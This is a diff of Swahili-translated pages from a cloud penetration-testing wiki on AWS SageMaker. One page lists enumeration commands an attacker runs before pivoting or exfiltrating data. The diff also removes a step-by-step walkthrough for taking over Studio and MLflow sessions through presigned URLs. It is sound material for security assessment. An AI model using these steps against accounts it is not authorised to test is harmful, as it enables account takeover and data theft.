b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md @@ -4,29 +4,29 @@ ## Muhtasari wa Huduma -Amazon SageMaker ni jukwaa iliyoendeshwa na AWS ya machine-learning ambayo inaunganisha notebooks, miundombinu ya training, orchestration, registries, na managed endpoints. Kuingiliwa kwa rasilimali za SageMaker kwa kawaida kunatoa: +Amazon SageMaker ni jukwaa la AWS la managed machine-learning linalounganisha notebooks, training infrastructure, orchestration, registries, na managed endpoints. Kukamatwa kwa rasilimali za SageMaker kwa kawaida kunatoa: -- IAM execution roles za muda mrefu zenye upatikanaji mpana wa S3, ECR, Secrets Manager, au KMS. -- Upatikanaji wa seti za data nyeti zilizohifadhiwa katika S3, EFS, au ndani ya feature stores. -- Vifunguo vya mtandao ndani ya VPCs (Studio apps, training jobs, endpoints). -- Presigned URLs zenye ruhusa za juu ambazo zinaweza kupita console authentication. +- Roles za utekelezaji za IAM zenye maisha marefu na ufikiaji mpana wa S3, ECR, Secrets Manager, au KMS. +- Ufikiaji wa datasets nyeti zilizohifadhiwa kwenye S3, EFS, au ndani ya feature stores. +- Footholds za mtandao ndani ya VPCs (Studio apps, training jobs, endpoints). +- Presigned URLs zenye kiwango cha juu cha ruhusa zinazopita authentication ya console. -Kuelewa jinsi SageMaker ilivyojengwa ni muhimu kabla ya kufanya pivot, persist, au exfiltrate data. +Kuelewa jinsi SageMaker imejengwa ni muhimu kabla ya pivot, persist, au exfiltrate data. -## Vipengele vya Msingi +## Core Building Blocks -- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Kila domain ina mfumo wa faili wa EFS unaoshirikiwa na default execution role. -- **Notebook Instances**: Managed EC2 instances kwa notebooks huru; hutumia execution roles tofauti. -- **Training / Processing / Transform Jobs**: Containers za muda mfupi zinazovuta code kutoka ECR na data kutoka S3. -- **Pipelines & Experiments**: Orchestrated workflows ambazo zinaelezea hatua zote, inputs, na outputs. +- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Kila domain ina sistema ya faili ya shared EFS na default execution role. +- **Notebook Instances**: Managed EC2 instances kwa notebooks standalone; hutumia execution roles tofauti. +- **Training / Processing / Transform Jobs**: Containers za ephemeral zinazovuta code kutoka ECR na data kutoka S3. +- **Pipelines & Experiments**: Workflows za orchestration zinazoeleza hatua zote, inputs, na outputs. - **Models & Endpoints**: Artefacts zilizopakizwa zinazotumika kwa inference kupitia HTTPS endpoints. - **Feature Store & Data Wrangler**: Managed services kwa maandalizi ya data na usimamizi wa features. -- **Autopilot & JumpStart**: Automated ML na katalogi ya modeli zilizochaguliwa. -- **MLflow Tracking Servers**: MLflow UI/API iliyosimamiwa yenye presigned access tokens. +- **Autopilot & JumpStart**: Automated ML na catalogue ya models iliyorekebishwa. +- **MLflow Tracking Servers**: Managed MLflow UI/API zenye presigned access tokens. -Kila rasilimali ina rejea kwa execution role, maeneo ya S3, container images, na usanidi wa hiari wa VPC/KMS — rekodi zote hizi wakati wa enumeration. +Kila rasilimali inarejea execution role, S3 locations, container images, na configuration ya hiari ya VPC/KMS—zisikie zote wakati wa enumeration. -## Akaunti & Metadata ya Ulimwenguni +## Metadata ya Akaunti & Ulimwenguni ```bash REGION=us-east-1 # Portfolio status, used when provisioning Studio resources @@ -39,9 +39,9 @@ aws sagemaker list-models --region $REGION --query 'Models[].ExecutionRoleArn' - # Generic tag sweep across any SageMaker ARN you know aws sagemaker list-tags --resource-arn --region $REGION ``` -Tambua uaminifu wowote kati ya akaunti (cross-account trust) — kama execution roles au S3 buckets zenye external principals — na vikwazo vya msingi kama service control policies au SCPs. +Angalia chochote cross-account trust (execution roles or S3 buckets with external principals) na vikwazo vya msingi kama service control policies or SCPs. -## Domaini za Studio, Apps & Nafasi Zilizoshirikiwa +## Studio Domains, Apps & Shared Spaces ```bash aws sagemaker list-domains --region $REGION aws sagemaker describe-domain --domain-id --region $REGION @@ -60,14 +60,14 @@ aws sagemaker describe-space --domain-id --space-name --regi aws sagemaker list-studio-lifecycle-configs --region $REGION aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name --region $REGION ``` -Nini cha kurekodi: +Kile cha kurekodi: - `DomainArn`, `AppSecurityGroupIds`, `SubnetIds`, `DefaultUserSettings.ExecutionRole`. -- EFS iliyopachikwa (`HomeEfsFileSystemId`) na folda za nyumbani za S3. -- Lifecycle scripts (mara nyingi huwa na bootstrap credentials au push/pull code ya ziada). +- EFS iliyopachikwa (`HomeEfsFileSystemId`) na saraka za nyumbani za S3. +- Scripti za lifecycle (mara nyingi zinaweza kuwa na bootstrap credentials au code ya ziada ya push/pull). > [!TIP] -> Presigned Studio URLs zinaweza kupita uthibitishaji ikiwa zimepewa kwa wingi. +> Presigned Studio URLs zinaweza kupitisha uthibitisho ikiwa zimetolewa kwa upana. ## Notebook Instances & Lifecycle Configs ```bash @@ -80,9 +80,9 @@ Metadata ya notebook inaonyesha: - Role ya utekelezaji (`RoleArn`), ufikiaji wa moja kwa moja wa intaneti dhidi ya hali ya VPC pekee. - Maeneo ya S3 katika `DefaultCodeRepository`, `DirectInternetAccess`, `RootAccess`. -- Scripts za lifecycle kwa ajili ya credentials au persistence hooks. +- Script za lifecycle kwa ajili ya credentials au persistence hooks. -## Mafunzo, Usindikaji, Transform & Kazi za Batch +## Mafunzo, Usindikaji, Transform & Batch Jobs ```bash aws sagemaker list-training-jobs --region $REGION aws sagemaker describe-training-job --training-job-name --region $REGION @@ -93,14 +93,14 @@ aws sagemaker describe-processing-job --processing-job-name --region $REGI aws sagemaker list-transform-jobs --region $REGION aws sagemaker describe-transform-job --transform-job-name --region $REGION ``` -Chunguza kwa makini: +Chunguza: -- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – ni ECR images zipi zimewekwa. +- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – ni ECR images gani zimetumika. - `InputDataConfig` & `OutputDataConfig` – S3 buckets, prefixes, na KMS keys. -- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – baini msimamo wa mtandao au usimbaji. +- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – zinaamua msimamo wa mtandao au usimbaji. - `HyperParameters` inaweza leak siri za mazingira au connection strings. -## Mifereji, Experimenti & Majaribio +## Pipelines, Experiments & Trials ```bash aws sagemaker list-pipelines --region $REGION aws sagemaker list-pipeline-executions --pipeline-name --region $REGION @@ -110,9 +110,9 @@ aws sagemaker list-experiments --region $REGION aws sagemaker list-trials --experiment-name --region $REGION aws sagemaker list-trial-components --trial-name --region $REGION ``` -Maelezo ya pipeline yanaelezea kila hatua, majukumu yaliyohusishwa, picha za container, na variables za mazingira. Vipengele vya majaribio mara nyingi vinabeba URI za artefakti za mafunzo, logi za S3, na metrics zinazoashiria mtiririko wa data nyeti. +Ufafanuzi wa pipeline unaeleza kila hatua, majukumu yanayohusiana, container images, na environment variables. Vijenge vya jaribio mara nyingi vina training artefact URIs, logi za S3, na metrics zinazoweza kuashiria mtiririko wa data nyeti. -## Miundo, Mipangilio ya Endpoint & Endpoints Zilizowekwa +## Modeli, Mipangilio ya Endpoint & Endpoints Zilizowekwa ```bash aws sagemaker list-models --region $REGION aws sagemaker describe-model --model-name --region $REGION @@ -123,12 +123,12 @@ aws sagemaker describe-endpoint-config --endpoint-config-name --region $RE aws sagemaker list-endpoints --region $REGION aws sagemaker describe-endpoint --endpoint-name --region $REGION ``` -Maeneo ya kipaumbele: +Maeneo ya kuzingatia: -- URI za artefakti za modeli kwenye S3 (`PrimaryContainer.ModelDataUrl`) na container images za inference. -- Usanidi wa Endpoint data capture (S3 bucket, KMS) kwa ajili ya uwezekano wa log exfil. -- Multi-model endpoints zinazotumia `S3DataSource` au `ModelPackage` (kagua kwa cross-account packaging). -- Network configs na security groups zilizounganishwa na endpoints. +- URI za artefact za modeli za S3 (`PrimaryContainer.ModelDataUrl`) na inference container images. +- Usanidi wa kunasa data wa endpoint (S3 bucket, KMS) kwa ajili ya possible log exfil. +- Multi-model endpoints zinazotumia `S3DataSource` au `ModelPackage` (angalia cross-account packaging). +- Mipangilio ya network na security groups zilizoambatishwa kwa endpoints. ## Feature Store, Data Wrangler & Clarify ```bash @@ -143,11 +143,11 @@ aws sagemaker list-model-monitoring-schedule --region $REGION ``` Mambo muhimu ya usalama: -- Online feature stores hureplica data kwa Kinesis; angalia `OnlineStoreConfig.SecurityConfig.KmsKeyId` na VPC. -- Data Wrangler flows mara nyingi hujumuisha nenosiri za JDBC/Redshift au endpoints za kibinafsi. -- Clarify/Model Monitor jobs huweka data kwenye S3 ambayo inaweza kusomeka kwa umma au kupatikana kwa accounts nyingine. +- Online feature stores hunakili data kwa Kinesis; angalia `OnlineStoreConfig.SecurityConfig.KmsKeyId` na VPC. +- Data Wrangler flows mara nyingi huingiza kredensiali za JDBC/Redshift au private endpoints. +- Clarify/Model Monitor jobs hutoa data kwenda S3 ambayo inaweza kusomwa na mtu yeyote (world-readable) au kupatikana kwa akaunti nyingine (cross-account accessible). -## MLflow Tracking Servers, Autopilot & JumpStart +## MLflow Seva za Kufuatilia, Autopilot & JumpStart ```bash aws sagemaker list-mlflow-tracking-servers --region $REGION aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION @@ -158,15 +158,15 @@ aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION aws sagemaker list-jumpstart-models --region $REGION aws sagemaker list-jumpstart-script-resources --region $REGION ``` -- MLflow tracking servers store experiments and artefacts; presigned URLs can expose everything. -- Autopilot jobs spin multiple training jobs—enumerate outputs for hidden data. -- JumpStart reference architectures may deploy privileged roles into the account. +- Server za tracking za MLflow zinahifadhi experiments na artefacts; presigned URLs zinaweza kufichua kila kitu. +- Autopilot jobs huendesha training jobs nyingi—orodhesha outputs kutafuta data iliyofichwa. +- JumpStart reference architectures zinaweza kupeleka privileged roles ndani ya akaunti. -## IAM & Networking Considerations +## IAM & Mambo ya Mtandao -- Enumerate IAM policies attached to all execution roles (Studio, notebooks, training jobs, pipelines, endpoints). -- Check network contexts: subnets, security groups, VPC endpoints. Many organisations isolate training jobs but forget to restrict outbound traffic. -- Review S3 bucket policies referenced in `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` for external access. +- Orodhesha IAM policies zilizounganishwa na execution roles zote (Studio, notebooks, training jobs, pipelines, endpoints). +- Kagua muktadha wa mtandao: subnets, security groups, VPC endpoints. Mashirika mengi hutenganisha training jobs lakini kusahau kuzuia outbound traffic. +- Kagua S3 bucket policies zilizotajwa katika `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` kwa ufikiaji wa nje. ## Privilege Escalation @@ -192,7 +192,7 @@ aws sagemaker list-jumpstart-script-resources --region $REGION ../aws-sagemaker-unauthenticated-enum/README.md {{#endref}} -## References +## Marejeo - [AWS SageMaker Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/whatis.html) - [AWS CLI SageMaker Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/index.html) diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md index 0d575a5bb..a9ba1cd40 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md @@ -1,108 +1,13 @@ -# AWS - SageMaker Unauthorized Access +# AWS - SageMaker Ufikiaji Usioidhinishwa {{#include ../../../../banners/hacktricks-training.md}} -## SageMaker Studio - Account Takeover via CreatePresignedDomainUrl (Impersonate Any UserProfile) +## Presigned URLs for SageMaker -### Maelezo -Kitambulisho chenye ruhusa ya kupiga simu `sagemaker:CreatePresignedDomainUrl` kwenye lengwa la Studio `UserProfile` kinaweza kutengeneza URL ya kuingia ambayo inaingia moja kwa moja ndani ya SageMaker Studio kama profile hiyo. Hii inampa kivinjari cha mshambulizi kikao cha Studio kinachorithi ruhusa za `ExecutionRole` za profile na ufikiaji kamili wa nyumbani na apps za profile zilizo kwenye EFS. Hakuna `iam:PassRole` au console access inahitajika. +Ikiwa mshambuliaji ataweza kupata presigned URL ya rasilimali ya SageMaker, wanaweza kuifikia bila uthibitisho mwingine wowote. Idhini na kiwango cha ufikiaji vitaegemea role inayohusishwa na rasilimali: -### Mahitaji -- SageMaker Studio `Domain` na `UserProfile` lengwa ndani yake. -- Mhusika mshambulizi anahitaji `sagemaker:CreatePresignedDomainUrl` kwenye `UserProfile` lengwa (resource‑level) au `*`. - -Mfano wa sera ya chini kabisa (iliyoelekezwa kwa UserProfile mmoja): -```json -{ -"Version": "2012-10-17", -"Statement": [ -{ -"Effect": "Allow", -"Action": "sagemaker:CreatePresignedDomainUrl", -"Resource": "arn:aws:sagemaker:::user-profile//" -} -] -} -``` -### Hatua za Matumizi Mabaya - -1) Orodhesha Studio Domain na UserProfiles unazoweza kulenga -```bash -DOM=$(aws sagemaker list-domains --query 'Domains[0].DomainId' --output text) -aws sagemaker list-user-profiles --domain-id-equals $DOM -TARGET_USER= -``` -2) Tengeneza presigned URL (inayokuwa halali kwa takriban dakika 5 kwa chaguo-msingi) -```bash -aws sagemaker create-presigned-domain-url \ ---domain-id $DOM \ ---user-profile-name $TARGET_USER \ ---query AuthorizedUrl --output text -``` -3) Fungua URL iliyorejeshwa katika kivinjari ili kuingia kwenye Studio kama mtumiaji lengwa. Katika terminal ya Jupyter ndani ya Studio thibitisha kitambulisho cha ufanisi: -```bash -aws sts get-caller-identity -``` -Vidokezo: -- `--landing-uri` inaweza kuachwa. Baadhi ya thamani (mfano, `app:JupyterLab:/lab`) zinaweza kukataliwa kulingana na toleo la Studio; chaguo-msingi kawaida hurudisha kwenye ukurasa wa nyumbani wa Studio kisha kwenda Jupyter. -- Sera za shirika/vizuizi vya VPC endpoint vinaweza bado kuzuia ufikiaji wa mtandao; kutengeneza tokeni hakuhitaji kuingia kwenye console au `iam:PassRole`. - -### Athari -- Lateral movement and privilege escalation kwa kubadilisha kuwa yoyote Studio `UserProfile` ambayo ARN yake imeruhusiwa, ukirithi `ExecutionRole` yake na filesystem/apps yake. - -### Ushahidi (kutoka kwenye jaribio lililodhibitiwa) -- Kwa kuwa na `sagemaker:CreatePresignedDomainUrl` pekee kwenye `UserProfile` lengwa, roli ya mshambuliaji ilirejesha kwa mafanikio `AuthorizedUrl` kama: -``` -https://studio-d-xxxxxxxxxxxx.studio..sagemaker.aws/auth?token=eyJhbGciOi... -``` -- Ombi la moja kwa moja la HTTP linajibiwa kwa kurudishwa (HTTP 302) kuelekea Studio, likithibitisha kuwa URL ni halali na hai hadi liishe muda wake. - - -## SageMaker MLflow Tracking Server - ATO via CreatePresignedMlflowTrackingServerUrl - -### Maelezo -Shahsi mwenye idhini ya kuita `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwa target SageMaker MLflow Tracking Server anaweza kutengeneza URL ya matumizi ya mara moja (presigned) inayothibitisha moja kwa moja kwenye UI iliyosimamiwa ya MLflow kwa server hiyo. Hii inampa ufikiaji sawa na mtumiaji halali angekuwa nao kwa server (kuona/kuunda experiments na runs, na kupakua/kupakia artifacts katika S3 artifact store ya server) bila ufikiaji wa console au `iam:PassRole`. - -### Mahitaji -- SageMaker MLflow Tracking Server katika account/region na jina lake. -- Mshambuliaji (principal) anahitaji idhini ya `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwenye rasilimali ya MLflow Tracking Server lengwa (au `*`). - -Mfano wa sera ya chini kabisa (iliyopangwa kwa Tracking Server moja): -```json -{ -"Version": "2012-10-17", -"Statement": [ -{ -"Effect": "Allow", -"Action": "sagemaker:CreatePresignedMlflowTrackingServerUrl", -"Resource": "arn:aws:sagemaker:::mlflow-tracking-server/" -} -] -} -``` -### Hatua za Kutumia Vibaya - -1) Orodhesha MLflow Tracking Servers unaoweza target na chagua jina moja -```bash -aws sagemaker list-mlflow-tracking-servers \ ---query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}' -TS_NAME= -``` -2) Tengeneza presigned MLflow UI URL (inayotumika kwa muda mfupi) -```bash -aws sagemaker create-presigned-mlflow-tracking-server-url \ ---tracking-server-name "$TS_NAME" \ ---expires-in-seconds 300 \ ---session-expiration-duration-in-seconds 1800 \ ---query AuthorizedUrl --output text -``` -3) Fungua URL iliyorejeshwa kwenye kivinjari ili kufikia MLflow UI kama mtumiaji aliyethibitishwa kwa Tracking Server husika. - -Vidokezo: -- Tracking Server lazima iwe katika hali ya tayari (mfano, `Created/Active`). Ikiwa bado iko `Creating`, ombi litakataliwa. -- The presigned URL ni ya matumizi mara moja na ni ya muda mfupi; tengeneza mpya inapohitajika. - -### Athari -- Ufikiaji wa moja kwa moja wa MLflow UI iliyosimamiwa kwa Tracking Server lengwa, kuruhusu kutazama na kubadilisha experiments/runs na kupata au kupakia artifacts zilizohifadhiwa katika S3 artifact store iliyosanidiwa ya server, ndani ya ruhusa zinazotekelezwa na usanidi wa server. +{{#ref}} +../../aws-privilege-escalation/aws-sagemaker-privesc/README.md +{{#endref}} {{#include ../../../../banners/hacktricks-training.md}}